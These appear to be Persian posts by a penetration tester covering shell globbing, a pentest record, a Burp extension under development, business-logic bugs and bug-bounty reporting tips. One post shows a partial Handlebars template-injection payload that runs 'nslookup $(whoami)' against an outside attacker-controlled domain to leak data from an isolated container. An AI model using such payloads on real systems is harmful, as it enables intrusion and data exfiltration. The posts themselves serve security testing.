یه سوال ساده لینوکسی، این کامند ها چی ان و چیکار دارن میکنن

اولی یکی از اسکریپت های دم دستی خودمه هیچی ، سی دی هم که مشخصه ، encrypt_gpg هم یه wrapper دور gpg ا که باز خودم نوشتم و نکته اصلی توی این عکس globbing ا وقتی شما یادش بگرید توی کار دستتون خیلی باز تره هم از تکرار تایپ کردن مکررات راحت میشید هم سرعت کارتون میره بالا و از اونجایی که built-in شل هستن سرعت پردازش این گرانقدر ها هم بیشتره از ابزار های third-party

حالا این glob اول چی هست؟ میگیم که داخل این پوشه تمام فایل های که gpg نیستن رو وردار و بعد از داخل اونا آخرین فایلی که ساختیم رو تف کن بیرون

چرا اینکارو میکنم ؟ چون اسم فایل ها sha256 ان و سخته وارد کردنشون منم این نوع رمزگذاری رو همیشه و همیشه بلافاصله بعد از پایان رکورد اودینس انجام میدم پس به مشکلی با این کامند نمیخورم

خب رسما تیم ما رکورد زد
۱۲۰ آسیب پذیری از یه سامانه که هنوز ۱۲ روز از تستش مونده 😂

خب خیلی وقت بود جایی RCE ندیده بودم که دیدیم خداروشکر
به سختی ولی واقعا به سختی
چرا به سختی چندتا دلیل داره
یکی از سرویس های ایزولشون آسیب پذیره
روی اون کانتینر عملا هیچی ندارن و کاملا ایزوله است
تنها پورتی که روش بازه ۵۳ ا
و به زور nslookup تونستیم یه کارایی بکنیم
template injection --> rce

چجوری؟ اینجوری...
{{#with "constructor"}}
....
{{cp.exec "nslookup $(whoami).mymachine.attckmachine.ir"}}
{{/with}}
...

بیشترشو ننوشتم حسش نبود ولی باید یه پراسس صدا کنید و بعد چایلد پراسس بسازید و بعد exec
...

خداوکیلی از حق نگذریم یه سری از این آسیب پذیری ها خیلی به من حال میدن یکیش چیزایی که به rce میتونم برسونم اصلا روحم جلا پیدا میکنه

یکی از بچه ها میگه
چرا curl نزدی
چرا dig نزدی
چرا فلان نکردی
IQ عزیزم
چرا باید طرف رو کانتینری که تقریباً هیچی نداره و تا خشتک ایزوله شده بیاد دیگ نصب کنه؟
دیگه اصلا نبود روش وگر نه سعی کردیم بزنیم
😂

she's a doll with a twist 😄
@lousbs

https://www.cl.cam.ac.uk/teaching/1213/PrincComm/mfcn.pdf
این کتاب هم تقدیم به نگاه دوستانی که میگن واسه شبکه لازم نیست ریاضی بدونی
@lousbs

😂😂😂😂
خب‌ چه کاریه
چهارتا skiddy میاید اکانت این بنده خدا هارو میزنید

من اهداف شوم شماهارو میدونم واسه همین مالورره نمیفرستم براتون 😂

یه اکستنشن بسی خفن رو شروع کردم به دولوپ واسه برپ تموم شه شاید اینو جدی جدی پابلیک کنم شما ام استفاده کنید، شایدم لا۶ بازی در بیارم پابلیک نکنم ولی خب چیز خفنیه

واسه این که همین جوابو بگیرم
۲۶۰ لاین فاکینگ جاوا نوشتم و احساس سرویس شدگی دارم 😂
از اسم دایرکتوری مشخصه قراره چی باشه اکستنشن
یه extender rest api واسه rest api خود برپ
بدیش اینه باید از صفر نوشته شه چرا؟ چون compatible نیست
چیزایی ام که قدیم بقیه نوشتن رو ورژن های خیلی قدیمیه نتیجتا باید خودم مینوشتمش 😂

حالا چرا دارم اینو می‌نویسم؟
به دو دلیل از bambda خوشم نمیاد
و rest api خود برپ شدیداً محدوده به scan کردن
حالا کاربردش چیه؟ با همچین چیزی میتونم تمام فلو هایی که توی برپ میرمو automatic کنم و headless باشه از مزایای collaborator هم بهره ببرم بازم تو بستر یه api تمیز
از این مهم تر اینجوری میتونم integration های سنگین با بقیه ابزار ها داشته باشم و دخالت خودمو تا جای ممکن کم کنم 😂

جدی منطق بیزینس رو جدی بگیرید یه وقتایی یه negative value جای positive توی body parameters api عزیزتون میتونه میلیون ها پولو جا به جا کنه و تا شما بفهمید اون پول رفته که رفته ، ماها کارمون اینه و اخلاق مدار ایم!
وقتی سامانه گرامیتون رو فاکینگ پروداکشنه خیلی باید حواس جمع باشید !

این آسیب پذیری رسماً داره جیب مالک کسب و کارو خالی میکنه که هیچ صفر میکنه و پول تو این مدل شبکه ها مثل قند و نبات جا به جا میشه تا شما بیاید بهش برسید هزار تا اکانت عوض کرده و اون هکر گرامی داره تو هاوایی موهیتو میخوره یا سرما پسند باشه کف موسکو ودکا سر میکشه و به ریش دولوپر هاتون می‌خنده!

واقعاً امنیت رو جدی بگیرید خصوصاً وقتی با پول سر و کار داره بیزینس محترمتون...

از
kimi ai
باگ زدم وسط کار 😂😂

شب اینو احتمالا حال داشته باشم ویدیو میگیرم آپلود میکنم پشماتون فر بخوره 😂

یه نکته طلایی بهتون بگم که توی بانتی و پنتست خصوصاً بانتی خیلی مهمه.
به وقتایی شما از یه جایی یه باگی میزنید که همون یدونه باگ چندین violation ایجاد میکنه.
برای مثال یدونه باگ میاد همزمان ledger discrepancy ایجاد میکنه، limitations bypasses رو داخل خودش داره و یه آسیب پذیری اصلی هم که روش فوکوس کردید هست
اینجا بهتره سه تا ریپورت پشت هم و جدا تهیه کنید و مشخص کنید این سه تا آسیب پذیری مختلف روی یه اندپوینت و یه جا به عنوان یه issue بفرستیدش اینجور مواقع میشه بانتی بیشتری گرفت 😄